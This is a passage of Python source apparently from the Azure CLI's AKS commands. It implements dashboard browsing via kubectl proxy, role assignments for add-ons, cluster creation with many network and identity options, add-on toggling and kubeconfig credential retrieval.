except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
if os.getenv("PYTEST_CURRENT_TEST", None):
timeout = 10
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT, timeout=timeout)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
no_wait=False,
yes=False,
enable_azure_rbac=False):
ManagedClusterWindowsProfile = cmd.get_models('ManagedClusterWindowsProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceNetworkProfile = cmd.get_models('ContainerServiceNetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceLinuxProfile = cmd.get_models('ContainerServiceLinuxProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshConfiguration = cmd.get_models('ContainerServiceSshConfiguration',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshPublicKey = cmd.get_models('ContainerServiceSshPublicKey',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAgentPoolProfile = cmd.get_models('ManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties = cmd.get_models(
'ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedCluster = cmd.get_models('ManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise MutuallyExclusiveArgumentError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError(
'Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(
outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id,
appgw_name,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise ArgumentUsageError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
# ids -> i_ds due to track 2 naming issue
admin_group_object_i_ds=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if enable_azure_rbac is True:
raise ArgumentUsageError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
cmd,
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if not enable_managed_identity and assign_identity:
raise ArgumentUsageError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
# pylint: disable=line-too-long
assign_identity: Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
# pylint: disable=line-too-long
raise ArgumentUsageError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
# pylint: disable=line-too-long
'kubeletidentity': ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(
cmd.cli_ctx,
cluster_identity_object_id,
assign_kubelet_identity)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
identity_profile=identity_profile
)
use_custom_private_dns_zone = False
if private_dns_zone:
if not enable_private_cluster:
raise InvalidArgumentValueError("Invalid private dns zone for public cluster. "
"It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise InvalidArgumentValueError(
private_dns_zone + " is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise ArgumentUsageError("--fqdn-subdomain should only be used for "
"private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if edge_zone:
ExtendedLocation = cmd.get_models('ExtendedLocation',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ExtendedLocationTypes = cmd.get_models('ExtendedLocationTypes',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
mc.extended_location = ExtendedLocation(
name=edge_zone,
type=ExtendedLocationTypes.EDGE_ZONE
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {
'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
custom_headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
if enable_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
# Check if KUBECONFIG environmental variable is set
# If path is different than default then that means -f/--file is passed
# in which case we ignore the KUBECONFIG variable
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
